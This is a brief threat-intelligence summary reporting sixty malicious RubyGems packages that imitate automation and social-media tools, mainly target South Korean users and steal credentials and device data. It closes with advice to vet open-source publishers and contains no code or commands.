Malicious Ruby gems containing credential-stealing code have been downloaded over 275,000 times since March 2023, primarily targeting developer accounts working with popular automation and social media tools. These gems distribute phishing tools that steal user credentials and device information, posing significant supply chain risks to the RubyGems ecosystem. #RubyGems #CredentialTheft
Keypoints
- Sixty malicious Ruby gems have been identified, targeting mainly South Korean users.
- The perpetrators used multiple aliases and accounts to publish these harmful packages on RubyGems.org.
- These gems imitate legitimate tools like WordPress automators, Telegram bots, and SEO tools with malicious intent.
- The malicious code exfiltrates usernames, passwords, device MAC addresses, and tracks campaign data.
- Developers are advised to scrutinize open-source libraries and verify publisher credibility to prevent supply chain attacks.